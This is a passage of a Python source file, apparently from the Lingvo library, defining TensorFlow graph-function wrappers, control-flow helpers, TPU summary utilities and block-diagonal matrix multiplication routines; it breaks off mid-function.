      _AssertInputsMatch(op, fwd_sig, res.captured_inputs)
      # Ensure dys contains no None.
      args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
      xs, _ = Pack([fwd_sig, res.captured_inputs], op.inputs)
      return backward_cf(*Flatten([xs, op.outputs, args]))
    return op.outputs, Grad
  # With a custom gradient there is no single TF function object to expose.
  res.func = None
  forward = lambda *xs: ForwardWithGrad(*Flatten([xs, res.captured_inputs]))
  res.call = lambda args=None: Call(forward, args)
  return res
# Global variable to control whether to use tf.function.
# If not set, the result is determined by tf2 status. See _UseTfFunction for
# details.
# TODO(laigd): remove after b/169869929 is fixed.
_USE_TF_FUNCTION = ThreadLocalStack()
# Constants for propagating framework tensors through Function.
_FRAMEWORK_TENSOR_GLOBAL_STEP = '_global_step'


@contextlib.contextmanager
def TfFunctionScope(use_tf_function=True):
  """Scopes whether Function uses tf.function instead of tf.Defun."""
  stack = _USE_TF_FUNCTION.stack
  stack.append(use_tf_function)
  try:
    yield
  finally:
    stack.pop()
def _UseTfFunction():
  """Whether to use tf.function instead of tf.Defun."""
  stack = _USE_TF_FUNCTION.stack
  if stack:
    return stack[-1]
  # Not explicitly scoped: follow the global TF2 status.
  return tf2_enabled()
class Function(object):
  """Builds a TensorFlow graph function from a callable.

  At a high level this is similar to tf.Defun and tf.function; in fact it
  relies on those as underlying implementations, but with specific
  configuration so it's easier to use and can work well in some extreme cases
  in Lingvo.

  Example usage:

  - No inputs:

    >>> @Function()
    ... def foo():
    ...   return tf.constant(1.0)
    >>> y = foo()

  - Scalar input:

    >>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32))
    ... def foo(x):
    ...   return x * 2
    >>> y = foo(1.0)

  - List input:

    >>> @Function(fwd_sig=[tf.TensorSpec(None, tf.float32) for _ in range(2)])
    ... def foo(xs):
    ...   return xs[0] + xs[1]
    >>> y = foo([1.0, 2.0])

  - Nested input:

    >>> @Function(fwd_sig=NestedMap(x=tf.TensorSpec(None, tf.float32)))
    ... def foo(nmap):
    ...   return nmap.x * 2
    >>> y = foo(NestedMap(x=1.0))

  - With custom gradient function (other input types mentioned above are also
    supported):

    >>> def bar(x, y, dy):
    ...   del y, dy
    ...   return 4.0 * x * dy
    >>>
    >>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32), bak=bar)
    ... def foo(x):
    ...   return 2.0 * x * x

  - Used in control flow ops:

    >>> then_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: x / 2)
    >>> else_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: 3 * x + 1)
    >>> y = tf.If(cond, inputs, then_branch.func, else_branch.func)
  """

  # TODO(laigd): the use_tf_function option is added for backward compatibility
  # reasons. Remove it after the migration.
  def __init__(self,
               fwd_sig=None,
               bak=None,
               bak_as_function=False,
               device=None,
               use_tf_function=None):
    """Constructor.

    Below, `fwd` refers to the callable later given to `__call__`, which is
    used to build the TensorFlow graph function encapsulated by this object.

    Args:
      fwd_sig: A Nested Structure of tf.TensorSpec representing the input
        signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
        actual inputs should be compatible with this (have same shapes and
        dtypes).
      bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
        Structure. The custom backprop function for `fwd`. bak needs to return
        dcapture if `fwd` uses any implicitly captured tensors, whose gradients
        are dcapture.
      bak_as_function: Whether to create a TF graph function for `bak`.
      device: The device on which to run `fwd` and `bak`. Defaults to the
        current device.
      use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
    """
    # Only store the configuration; the graph function is built in __call__.
    self._fwd_sig = fwd_sig
    self._bak = bak
    self._bak_as_function = bak_as_function
    self._device = device
    self._use_tf_function = use_tf_function

  def __call__(self, fwd):
    """Creates a graph function.

    Args:
      fwd: a callable xs: Nested Structure -> ys: Nested Structure.

    Returns:
      A DefinedFunction object encapsulating `fwd` as a graph function.
    """
    assert callable(fwd)
    return DefinedFunction(
        fwd,
        self._fwd_sig,
        self._bak,
        self._bak_as_function,
        self._device,
        self._use_tf_function)
class DefinedFunction(object):
  """Encapsulates a TensorFlow graph function and its properties."""

  def __init__(self,
               fwd,
               fwd_sig=None,
               bak=None,
               bak_as_function=False,
               device=None,
               use_tf_function=None):
    """Constructor.

    Args:
      fwd: A callable xs: Nested Structure -> ys: Nested Structure. Used to
        build the TensorFlow graph function that this object encapsulates.
      fwd_sig: A Nested Structure of tf.TensorSpec representing the input
        signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
        actual inputs should be compatible with this (have same shapes and
        dtypes).
      bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
        Structure. The custom backprop function for `fwd`. bak needs to return
        dcapture if `fwd` uses any implicitly captured tensors, whose gradients
        are dcapture.
      bak_as_function: Whether to create a TF graph function for `bak`.
      device: The device on which to run `fwd` and `bak`. Defaults to the
        current device.
      use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
    """
    self._fwd_sig = fwd_sig
    # NOTE(review): the next two assignments are unconditionally overwritten
    # below (wrapped_fwd_sig at the NestedMap() line, fwd_fn after
    # ForwardWrapped); kept as-is.
    wrapped_fwd_sig = fwd_sig
    fwd_fn = fwd
    bak_fn = bak
    # Capture the graph seed so traced functions reproduce it (tf.function
    # bodies don't inherit the parent graph's seed automatically).
    graph_random_seed = None
    if tf.get_default_graph().seed is not None:
      graph_random_seed = tf.get_default_graph().seed
    # Wrap the forward function to propagate framework tensors like step_seed
    # and global_step.
    wrapped_fwd_sig = NestedMap()
    self._added_global_step = False
    if GetGlobalStep() is not None:
      wrapped_fwd_sig[_FRAMEWORK_TENSOR_GLOBAL_STEP] = (
          tf.TensorSpec([], tf.int64))
      self._added_global_step = True
    if fwd_sig is not None:
      # User inputs travel under the 'inputs' key of the wrapped signature.
      wrapped_fwd_sig.inputs = fwd_sig
    elif not wrapped_fwd_sig:
      # Neither user inputs nor framework tensors: no signature at all.
      wrapped_fwd_sig = None

    def ForwardWrapped(wrapped_inputs=None):
      # Runs fwd with the graph seed restored and global_step rebound from
      # the wrapped inputs.
      if graph_random_seed is not None:
        tf.random.set_seed(graph_random_seed)
      global_step = None
      if wrapped_inputs:
        assert isinstance(wrapped_inputs, NestedMap)
        global_step = wrapped_inputs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)
      with GlobalStepContext(global_step):
        if wrapped_inputs and 'inputs' in wrapped_inputs:
          result = fwd(wrapped_inputs.inputs)
        else:
          result = fwd()
      return result

    fwd_fn = ForwardWrapped

    if bak:
      # Wrap the backward function to return zero gradients for framework
      # tensors like step_seed and global_step.
      def BackwardWrapped(wrapped_xs, ys, dys):
        if graph_random_seed is not None:
          tf.random.set_seed(graph_random_seed)
        with GlobalStepContext(
            wrapped_xs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)):
          result = bak(wrapped_xs.inputs, ys, dys)
        # Zero gradients for every wrapped (framework) tensor; user gradients
        # are filled in under .inputs below.
        dxs = Transform(tf.zeros_like, wrapped_xs)
        if isinstance(result, tuple) and len(result) == 2:
          # bak also returned gradients for implicit captures.
          dxs.inputs, dcapture = result
          return dxs, dcapture
        else:
          dxs.inputs = result
          return dxs

      bak_fn = BackwardWrapped

    if use_tf_function is None:
      use_tf_function = _UseTfFunction()
    fn = _DefineFunction if use_tf_function else _DefineDefun
    self._data = fn(
        fwd=fwd_fn,
        fwd_sig=wrapped_fwd_sig,
        bak=bak_fn,
        bak_as_function=bak_as_function,
        device=device)

  def __call__(self, args=None):
    """Invokes the graph function.

    Args:
      args: the inputs to the graph function, must be compatible with
        `fwd_sig`.

    Returns:
      The output tensors with the same structure as the output of `fwd`,
      returned by a call to the graph function.
    """
    assert IsCompatible(args,
                        self._fwd_sig), '{} vs {}'.format(args, self._fwd_sig)
    return self._data.call(self.AddFrameworkInputs(args))

  @property
  def func(self):
    """The underlying TensorFlow graph function that this object encapsulates.

    The returned graph function is created by tracing `fwd` during
    construction. If not None, it will be a _DefinedFunction or
    ConcreteFunction that takes flat inputs and returns flat outputs, and can
    be used by routines that require a TensorFlow function object (e.g. tf.If,
    tf.While, etc).

    If no backprop function is provided during construction, the result is
    always not None.
    """
    return self._data.func

  def AddFrameworkInputs(self, inputs):
    """Add framework tensors like step_seed and global_step to inputs.

    This is only necessary when using `func`, as wrapping is handled
    automatically in __call__.

    Args:
      inputs: inputs to the function.

    Returns:
      Inputs wrapped with framework tensors suitable for use with `func`.
    """
    result = NestedMap()
    if self._added_global_step:
      global_step = GetGlobalStep()
      assert global_step is not None
      result[_FRAMEWORK_TENSOR_GLOBAL_STEP] = tf.cast(global_step, tf.int64)
    if inputs is not None:
      result.inputs = inputs
    return result if result else None

  @property
  def output_dtypes(self):
    """Output dtypes of the graph function.

    The result will have the same structure as the outputs of `fwd` but contain
    the corresponding output dtypes.
    """
    return Transform(lambda x: x.dtype, self._data.outputs)

  @property
  def stateful_ops(self):
    """Stateful ops used by `fwd`, as a list of (op_name, op_type) tuples."""
    return self._data.stateful_ops

  @property
  def captured_inputs(self):
    """Implicit input tensors captured by `fwd`."""
    return self._data.captured_inputs
def CallDefun(fwd, args=None, bak=None, bak_as_function=False, device=None):
  """Wraps fwd in a defun with custom gradient bak and calls it with args.

  Args:
    fwd: A callable xs: Nested Structure -> ys: Nested Structure.
    args: A Nested Structure of tf.Tensor or None.
    bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
      Structure. The custom backprop function for fwd. bak needs to return
      dcapture if fwd uses any implicitly captured tensors, whose gradients are
      dcapture.
    bak_as_function: Whether to create a TF graph function for bak.
    device: the device on which to run fwd and bak.

  Returns:
    A Nested Structure equivalent to what fwd(args) computes.
  """
  if args is not None:
    args = Transform(tf.convert_to_tensor, args)
  defined = Function(
      fwd_sig=TensorSpecs(args),
      bak=bak,
      bak_as_function=bak_as_function,
      device=device)(
          fwd=fwd)
  return defined() if args is None else defined(args)
def If(cond, inputs, then_branch, else_branch):
  """Helper to construct an if/else statement.

  Args:
    cond: A scalar `Tensor` that can be converted to boolean.
    inputs: A flattenable representing the input tensors of the if/else
      statement. Can be None to represent no inputs.
    then_branch: A callable 'inputs' -> flattenable. The returned value should
      be compatible with what 'else_branch' returns.
    else_branch: A callable 'inputs' -> flattenable. The returned value should
      be compatible with what 'then_branch' returns.

  Returns:
    Output returned by the call to either 'then_branch' or 'else_branch'.
  """
  fwd_sig = TensorSpecs(inputs)
  then_sigs = Function(fwd_sig=fwd_sig)(fwd=then_branch)
  else_sigs = Function(fwd_sig=fwd_sig)(fwd=else_branch)
  assert IsCompatible(then_sigs.output_dtypes, else_sigs.output_dtypes), (
      'Outputs of then_branch and else_branch are not compatible: {} vs {}'
      .format(then_sigs.output_dtypes, else_sigs.output_dtypes))
  if then_sigs.captured_inputs != else_sigs.captured_inputs:
    raise ValueError('Differing captured inputs in then and else. '
                     'Ensure the same tensors are captured in the same order.')
  # Both branches receive framework tensors plus the shared captures.
  branch_inputs = Flatten(then_sigs.AddFrameworkInputs(inputs))
  branch_inputs += then_sigs.captured_inputs
  ret = tf.If(
      cond=cond,
      inputs=branch_inputs,
      then_branch=then_sigs.func,
      else_branch=else_sigs.func)
  return Pack(then_sigs.output_dtypes, ret)
def _Itype():
  """Loop iterator data type."""
  if use_xla():
    return tf.int32
  return tf.int64
def WhileLoop(cond, body, loop_state):
  """Helper to construct a while loop.

  Args:
    cond: A callable NestedMap -> tf.bool.
    body: A callable NestedMap -> NestedMap.
    loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
      loop state.

  Returns:
    The final loop state in the same structure as loop_state.
  """
  fwd_sig = TensorSpecs(loop_state)
  cond_fn = Function(fwd_sig=fwd_sig)(fwd=cond)

  def _BodyWrapped(state):
    # loop_state is augmented with global tensors inside of DefinedFunction.
    # WhileLoop needs to return the same structure as the inputs, so augment
    # the return value here to match.
    return cond_fn.AddFrameworkInputs(body(state))

  body_fn = Function(fwd_sig=fwd_sig)(fwd=_BodyWrapped)
  wrapped_inputs = body_fn.AddFrameworkInputs(loop_state)
  final_state = tf.While(
      Flatten(wrapped_inputs), cond=cond_fn.func, body=body_fn.func)
  # The functional `While` used above does not have a registered gradient.
  # This was not a problem in Graph mode, however in Eager mode, GradientTape
  # will attempt to call the gradient of the While op in the forward pass.
  # `stop_gradient` is used to pretend the op is a constant in the forward
  # pass. This also avoids calling the gradient of other ops in `While` in the
  # forward pass.
  # Details in https://www.tensorflow.org/api_docs/python/tf/custom_gradient.
  # Guarded by 'IsEagerMode' to limit impact.
  if IsEagerMode():
    final_state = [tf.stop_gradient(t) for t in final_state]
  return Pack(wrapped_inputs, final_state).inputs
def ForLoop(body, start, limit, delta, loop_state):
  """Helper to construct a for loop.

  Args:
    body: A callable (tf.int, NestedMap) -> NestedMap.
    start: Loop variable's initial value.
    limit: Loop variable's limit value.
    delta: Loop variable's change per iteration.
    loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
      loop state.

  Returns:
    The final loop state in the same structure as loop_state.
  """
  itype = _Itype()
  state = NestedMap(
      iter=tf.cast(start, itype),
      limit=tf.cast(limit, itype),
      delta=tf.cast(delta, itype),
      loop_state=loop_state)

  def _Cond(s):
    return tf.less(s.iter, s.limit)

  def _Body(s):
    s.loop_state = body(s.iter, s.loop_state)
    s.iter = tf.add(s.iter, s.delta)
    return s

  return WhileLoop(_Cond, _Body, state).loop_state
def TopK(x_in, k):
  """Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
  assert k <= 2, 'This implementation is only efficient for small k.'
  # TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
  # 2d tensor, then call tf.math.top_k, and then reshape back.
  shape = x_in.shape
  rank = shape.rank
  assert rank and shape.as_list()[rank - 1] > 0
  last_dim = shape.as_list()[rank - 1]
  # A value strictly smaller than every entry, used to mask out each maximum
  # after it has been selected.
  floor_value = tf.math.reduce_min(x_in) - 1.0
  indices = []
  values = []
  for _ in range(k):
    argmax = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
    onehot = tf.one_hot(argmax, last_dim)
    # TODO(yonghui): Would tf.gather be more efficient and numerically stable
    # here?
    top_value = tf.reduce_sum(onehot * x_in, -1, keepdims=True)
    x_in = (1.0 - onehot) * x_in + onehot * floor_value
    indices.append(tf.expand_dims(argmax, -1))
    values.append(top_value)
  if k == 1:
    return values[0], indices[0]
  return tf.concat(values, rank - 1), tf.concat(indices, rank - 1)
def ReadVariable(var_op):
  """Returns the value of the given variable operation.

  Args:
    var_op: the `Operation` object for a VarHandleOp.

  Raises:
    TypeError: if var_op is not a VarHandleOp.

  Returns:
    A `Tensor` containing the value of the variable.
  """
  if var_op.type != 'VarHandleOp':
    raise TypeError('var_op should be a VarHandleOp, got %s' % str(var_op.type))
  # Filter out the ReadVariableOps that have control dependencies to avoid
  # side-effects when the user runs it.
  var_readers = [
      op for op in var_op.outputs[0].consumers()
      if op.type == 'ReadVariableOp' and not op.control_inputs
  ]
  assert var_readers
  return var_readers[0].outputs[0]
_TPU_SUMMARY_TENSORS_KEY = '__lingvo_tpu_summary_tensors'
_TPU_SUMMARY_CONTEXTS = ThreadLocalStack()


def _GetTpuSummaryTensor():
  """Returns the list AddTpuSummaryTensor() currently appends to."""
  stack = _TPU_SUMMARY_CONTEXTS.stack
  if stack:
    # Innermost TpuSummaryTensorContext wins.
    return stack[-1]
  return _CollectionGetter(_TPU_SUMMARY_TENSORS_KEY, lambda: [])()
@contextlib.contextmanager
def TpuSummaryTensorContext():
  """Creates a context where AddTpuSummaryTensor() will add tensors."""
  stack = _TPU_SUMMARY_CONTEXTS.stack
  stack.append([])
  try:
    yield
  finally:
    stack.pop()
def AddTpuSummaryTensor(name, value, weight=1.0):
  """Adds tensor to global collection of summaries, or a local context if any.

  This needs to be used in situations where tf.summary() could be used but
  currently tf.summary is not supported. Use py_utils.AddTpuSummaryTensor() in
  low level code to add summary tensors to global collection of summaries.
  Then recover all summary tensors from global collection by calling
  py_utils.GetTpuSummaryTensors() from top level code (for example from
  ComputeLoss method of BaseTask).

  In addition to 'name' argument, current tensorflow name scope is also
  captured and added to the metric name. This way for example summaries from
  a repeated layer will appear as separate graphs in the tensorboard.

  Weight argument is optional and defaults to 1.0. See BaseTask.ComputeLoss for
  the exact definition of weight for eval metrics.

  Args:
    name: metric name
    value: metric value tensor
    weight: weight tensor for weighted metrics
  """
  entry = NestedMap()
  entry.name = name
  # Store the (value, weight) pair; weight is converted so both are tensors.
  entry.value = value, tf.convert_to_tensor(weight)
  # Capture the current name scope to disambiguate repeated layers.
  entry.name_scope = tf.get_default_graph().get_name_scope()
  _GetTpuSummaryTensor().append(entry)
def GetTpuSummaryTensors():
  """Returns summary tensors from global collection.

  Returns:
    A dict containing str keys and (metric, weight) pairs as values
  """
  ret = {}
  for entry in _GetTpuSummaryTensor():
    key = '%s/%s' % (entry.name, SanitizeScopeKey(entry.name_scope))
    ret[key] = entry.value
  return ret
def ClearTpuSummaryTensors():
  """Empties the active TPU summary tensor collection in place."""
  _GetTpuSummaryTensor()[:] = []
def ComputationShape(split_size, topology=None):
  """Decides the computation shape based on the split_size.

  Args:
    split_size: number of accelerators to use per split.
    topology: a serialized string of `tensorflow.tpu.TopologyProto`, or a
      `tf.tpu.experimental.Topology` object, that describes the TPU cluster
      topology. If not set, it'll use a default setting based on split_size.

  Returns:
    A 4-element list that describes the computation shape.
  """
  # Fixed mapping from chip count to an [x, y, z] chip mesh; the trailing
  # cores-per-chip dimension is appended below. 32 chips is special-cased.
  chips_to_mesh = {
      1: [1, 1, 1],
      2: [1, 2, 1],
      4: [2, 2, 1],
      8: [4, 2, 1],
      12: [1, 1, 12],
      16: [4, 4, 1],
      24: [1, 2, 12],
      64: [8, 8, 1],
      128: [8, 16, 1],
      256: [16, 16, 1],
      512: [16, 32, 1],
      1024: [32, 32, 1],
      2048: [64, 32, 1],
      4096: [128, 32, 1],
  }
  topology_info = None
  if topology:
    if isinstance(topology, tf.tpu.experimental.Topology):
      topology_info = topology
    else:
      topology_info = tf_topology.Topology(serialized=topology)

  if topology_info is not None and functools.reduce(
      lambda a, b: a * b, topology_info.mesh_shape) == split_size:
    # The split occupies the entire mesh.
    return topology_info.mesh_shape
  if split_size == 1:
    return [1, 1, 1, 1]
  if (topology_info is not None and topology_info.mesh_shape[-1] == 1 and
      split_size in topology_info.mesh_shape):
    # For Megacore, if we find exact match on mesh shape, map split_size to it
    shape = [1, 1, 1, 1]
    shape[topology_info.mesh_shape.tolist().index(split_size)] = split_size
    return shape

  cores_per_chip = (
      topology_info.mesh_shape[-1] if topology_info is not None else 2)
  assert split_size % cores_per_chip == 0
  split_chips = split_size // cores_per_chip
  if split_chips == 32:
    if topology_info is not None and topology_info.mesh_shape[1] == 32:
      # Fwd within-replica all-reduces is performed along column;
      # Bwd gradient cross-replica all-reduces is performed along row.
      # This currently has better performance than the strided patten.
      return [1, 32, 1, cores_per_chip]
    return [4, 8, 1, cores_per_chip]
  assert split_chips in chips_to_mesh, (
      'Model parallelism with %d devices is currently not'
      ' supported.' % split_size)
  return chips_to_mesh[split_chips] + [cores_per_chip]
def GetExtraVars():
  """Returns the captured variables by the function."""
  graph = tf.get_default_graph()
  if not isinstance(graph, func_graph.FuncGraph):
    return function.get_extra_vars()
  return graph.variable_captures
def GetExtraInputs():
  """Returns the captured input tensors by the function."""
  graph = tf.get_default_graph()
  if not isinstance(graph, func_graph.FuncGraph):
    return function.get_extra_inputs()
  return graph.external_captures
def GetExtraArgs():
  """Returns the corresponding function arguments for the captured inputs."""
  graph = tf.get_default_graph()
  if not isinstance(graph, func_graph.FuncGraph):
    return function.get_extra_args()
  return graph.internal_captures
def ShardedFilePatternToGlob(file_pattern):
  """Converts a file pattern path@shards to path-?????-of-shards."""
  if ',' in file_pattern:
    raise ValueError(
        'ShardedFilePatternToGlob does not support multiple file patterns.')
  if '@' not in file_pattern:
    # Not a sharded pattern; pass through untouched.
    return file_pattern
  path, shards = file_pattern.split('@')
  # '*' means "any shard count"; otherwise zero-pad the count to 5 digits.
  suffix = '*' if shards == '*' else '%05d' % int(shards)
  return '%s-?????-of-%s' % (path, suffix)
def ComputeNceAndAuc(probs, targets, mask):
  """Compute normalized cross entropy and AUC of the PR curve for a batch.

  Args:
    probs: a tensor of shape [batch, time].
    targets: a tensor of shape [batch, time], where each element is either 0 or
      1 indicating wrong or correct.
    mask: a tensor of shape [batch, time], a mask for hyp sequence.

  Returns:
    nce: a tensor of shape [1], the normalized cross entropy value.
    auc: a tensor of shape [1], the AUC value.
  """

  def _SafeLog(t, floor=1e-8):
    """Clips all elements of t into [floor, 1] before taking the log."""
    return tf.math.log(tf.clip_by_value(t, floor, 1.0))

  # Per-token binary cross entropy.
  bce = -targets * _SafeLog(probs) - (1 - targets) * _SafeLog(1 - probs)
  # Fraction of correct tokens under the mask (word correct rate).
  correct_frac = tf.reduce_sum(targets * mask) / tf.reduce_sum(mask)
  prior_entropy = (-correct_frac * _SafeLog(correct_frac) -
                   (1 - correct_frac) * _SafeLog(1 - correct_frac))
  conditional_entropy = tf.reduce_mean(tf.boolean_mask(bce, mask))
  nce = (prior_entropy - conditional_entropy) / prior_entropy
  auc = tf.metrics.auc(targets, probs, mask, curve='PR')[1]
  return nce, auc
def GatherTensorValuesBySeqIndices(tensor, class_indices, keepdims=False):
  """Gather values from a 3d tensor according to sequences of indices.

  Args:
    tensor: a 3d tensor of [dim0, dim1, num_class], e.g. output from softmax.
    class_indices: a 2d tensor of [dim0, dim1], where the second dim is a
      sequence of class indices between 0 to num_class - 1, inclusive.
    keepdims: bool, expand the last dimension of the returned tensor if True.

  Returns:
    A tensor ret of [dim0, dim1], where
      ret[b, t] = tensor[b, t, indices[b, t]].
    If keepdims is True, then ret has shape [dim0, dim1, 1].
  """
  tensor = HasRank(tensor, 3)
  class_indices = HasRank(class_indices, 2)
  tensor = HasShape(tensor, GetShape(class_indices), 2)
  dims = GetShape(class_indices)
  idx_dtype = class_indices.dtype
  # Build [dim0, dim1] grids of row and column positions.
  row_ids = tf.tile(tf.expand_dims(tf.range(dims[0]), axis=-1), [1, dims[1]])
  col_ids = tf.tile(tf.expand_dims(tf.range(dims[1]), axis=0), [dims[0], 1])
  # Full (row, col, class) coordinates for gather_nd.
  nd_indices = tf.stack([
      tf.cast(row_ids, dtype=idx_dtype),
      tf.cast(col_ids, dtype=idx_dtype), class_indices
  ],
                        axis=-1)
  gathered = tf.gather_nd(tensor, nd_indices)
  if keepdims:
    gathered = tf.expand_dims(gathered, axis=-1)
  return gathered
def GetSoftmaxProbsBySeqIndices(logits, indices, keepdims=False):
  """Get softmax probabilities from index sequences given logits sequences.

  Args:
    logits: a tensor of [batch, time, num_class] or [time, batch, num_class].
    indices: a tensor of [batch, time] or [time, batch].
    keepdims: bool, expand the last dimension of the returned tensor if True.

  Returns:
    a tensor of [batch, time] or [time, batch] for the corresponding softmax
    probabilities. If keepdims is True, returned tensor has a third dimension
    of size 1.
  """
  return GatherTensorValuesBySeqIndices(
      tf.nn.softmax(logits), indices, keepdims)
def DivideNoNan(x, y):
  """Equivalent to tf.math.divide_no_nan but supports bfloat16."""
  is_zero = tf.equal(y, 0.0)
  # Substitute 1 for zero denominators so the division itself never NaNs,
  # then zero out those positions in the result.
  safe_denominator = tf.where(is_zero, tf.ones_like(y), y)
  return tf.where(is_zero, tf.zeros_like(x), x / safe_denominator)
def SequencePaddings(seqlen, maxlen=None):
  """Returns a float paddings tensor: 1.0 at padded positions, 0.0 elsewhere."""
  return 1 - tf.sequence_mask(seqlen, maxlen, dtype=tf.float32)
def AppendDims(x, ndims):
  """Appends `ndims` trailing size-1 dimensions to `x`."""
  expanded_shape = GetShape(x) + [1] * ndims
  return tf.reshape(x, expanded_shape)
def MaybeSoftCapLogits(x, cap=0.0):
  """Caps logits x to be within a certain range.

  Args:
    x: A float tensor, the logit values to be capped.
    cap: a float, the limit to cap x within. If cap <= 0.0, x is not capped.

  Returns:
    logits after capping.
  """
  # Guard clause: a non-positive cap disables capping entirely.
  if cap <= 0.0:
    return x
  return cap * tf.math.tanh(x / cap)
def GetTpuEmbeddingGraphCollection():
  """Return the graph collection that stores the TpuEmbeddingCollection."""
  collection = tf.get_collection_ref('__tpu_embedding_collection')
  # At most one TpuEmbeddingCollection may exist per graph.
  assert len(collection) <= 1
  return collection
class AuxLossContext:
  """Context that holds a list of aux-losses.

  By default it is non-reentrant, but can be specified as reentrant explicitly
  when creating an inner context.
  """

  # Stack of active contexts, shared across all instances.
  _global_stack = []

  @classmethod
  def Current(cls):
    """Returns current context or None."""
    return cls._global_stack[-1] if cls._global_stack else None

  def __init__(self, reentrant=False):
    self.aux_loss_tensors = []
    self._reentrant = reentrant

  def AddLoss(self, loss):
    """Records `loss` in this context."""
    self.aux_loss_tensors.append(loss)

  @property
  def aux_losses(self):
    """All losses recorded so far."""
    return self.aux_loss_tensors

  def __enter__(self):
    if not self._reentrant:
      # Non-reentrant contexts refuse to nest.
      assert not self._global_stack, 'no re-entry'
    self._global_stack.append(self)
    return self

  def __exit__(self, *args):
    self._global_stack.pop()
def GetTrainableVariables(scope, bprop_variable_filter,
                          bprop_variable_exclusion, vmap):
  """Returns trainable vars.

  Args:
    scope: A Python str.
    bprop_variable_filter: see BaseTask.Params().bprop_variable_filter.
    bprop_variable_exclusion: see BaseTask.Params().bprop_variable_exclusion.
    vmap: A NestedMap of var_path(str) -> tf Variable.

  Returns:
    A filtered NestedMap of var_path(str) -> trainable tf Variable.
  """
  include_re = (
      re.compile(bprop_variable_filter) if bprop_variable_filter else None)
  exclude_re = (
      re.compile(bprop_variable_exclusion)
      if bprop_variable_exclusion else None)

  def _KeepVariable(v):
    """Returns True if variable v should be optimized by this learner."""
    if not v.trainable:
      return False
    if include_re and not include_re.search(v.name):
      tf.logging.info('%s: disabled by bprop_variable_filter: %s', scope,
                      v.name)
      return False
    if exclude_re and exclude_re.search(v.name):
      tf.logging.info('%s: disabled by bprop_variable_exclusion: %s', scope,
                      v.name)
      return False
    return True

  return vmap.Filter(_KeepVariable)
def BlockDiagonalMatmul(inputs, w, input_num_blocks):
  """Block diagonal matmul.

  Args:
    inputs: a tf.Tensor with the last dimension being the dimension for matmul.
    w: an order-3 tf.Tensor of shape (input_num_blocks, input_dim //
      input_num_blocks, output_dim // input_num_blocks)
    input_num_blocks: an int specifying number of blocks for the input.

  Returns:
    A tf.Tensor of shape: inputs.shape[:-1] + [w.shape[-1]].
  """
  # Multiply each input block by its own weight slice, then re-join.
  blocks = tf.split(inputs, input_num_blocks, axis=-1)
  per_block = [tf.matmul(block, w[i, :, :]) for i, block in enumerate(blocks)]
  return tf.concat(per_block, axis=-1)
def BlockDiagonalMatmulWithMix(inputs, w, mix_kernel, input_num_blocks):
  """Block diagonal matmul with mix.

  With mix, the results from the blocked matmul are (linearly) mixed with
  trainable weights in mix_kernel.

  Args:
    inputs: a tf.Tensor with the last dimension being the dimension for matmul.
    w: an order-3 tf.Tensor of shape (input_num_blocks, input_dim //
      input_num_blocks, output_dim // input_num_blocks).
    mix_kernel: an order-2 tf.Tensor of shape (input_num_blocks,
      input_num_blocks).
    input_num_blocks: an int specifying number of blocks for the input.

  Returns:
    A tf.Tensor of shape: inputs.shape[:-1] + [w.shape[-1]].
  """
  blocks = tf.split(inputs, input_num_blocks, axis=-1)
  per_block = [tf.matmul(block, w[i, :, :]) for i, block in enumerate(blocks)]
  # Linearly combine the block outputs with the mix kernel weights.
  mixed = []
  for i in range(input_num_blocks):
    acc = 0.0
    for j in range(input_num_blocks):
      acc += mix_kernel[i, j] * per_block[j]
    mixed.append(acc)
  return tf.concat(mixed, axis=-1)
def BlockDiagonalProjectLastDim(inputs,
                                weight,
                                input_dim,
                                output_dim,
                                num_blocks=1):
  """Block diagonal linear projection on the last dim of the input tensor.

  This is a TPU efficient implementation to avoid reshaping inputs to Rank-2
  tensor by using Einsum for the compute.

  Args:
    inputs: An input Tensor, the last dimension of which is input_dim.
    weight: A weight matrix with shape [input_dim, output_dim].
    input_dim: An integer or a symbolic dim, the last dimension of the inputs.
    output_dim: An integer or a symbolic dim, the last dimension of the outputs.
    num_blocks: An integer or a symbolic dim, the number of blocks.

  Returns:
    An output Tensor of the same rank as inputs, the last dimension is
    output_dim.
  """
  # Resolve symbolic dims to concrete ints before they are used in shapes.
  input_dim = int(
      symbolic.ToStatic(input_dim) if symbolic.IsExpr(input_dim) else input_dim)
  output_dim = int(
      symbolic.ToStatic(output_dim) if symbolic.IsExpr(output_dim
                                                      ) else output_dim)
  # Assert input_dim and output_dim
  # NOTE: the assertions are attached as control dependencies on the tensors
  # themselves, so they run whenever inputs/weight are consumed below.
  inputs = with_dependencies([assert_equal(GetShape(inputs)[-1], input_dim)],
                             inputs)
  weight = with_dependencies([
      assert_equal(GetShape(weight)[0], num_blocks),
      assert_equal(GetShape(weight)[1], input_dim // num_blocks),
      assert_equal(GetShape(weight)[-1], output_dim // num_blocks)
  ], weight)
  # rank < 26 because the einsum below spells one lowercase letter per
  # leading dimension (plus 'y'/'z' for the contraction).
  if (use_tpu() and inputs.shape is not None and
      inputs.shape.rank is not None and inputs.shape.rank < 26):
    # Avoids reshape if feasible and uses Einsum.
    if inputs.shape.rank == 2:
      # outputs = tf.matmul(inputs, weight)
      outputs = BlockDiagonalMatmul(inputs, weight, num_blocks)
    else:
      # This is equivalent to:
      # outputs = tf.einsum('...y,yz->...z', inputs, weight)
      # Unfortunately ... in einsum() leads to extra HBM usage.
      s = ''.join([chr(x) for x in range(97, 123)]) # abc...xyz
      r = inputs.shape.rank
      input_splitted = tf.split(inputs, num_blocks, axis=-1)
      output_splitted = []
      for i, input_i in enumerate(input_splitted):
        output_splitted.append(
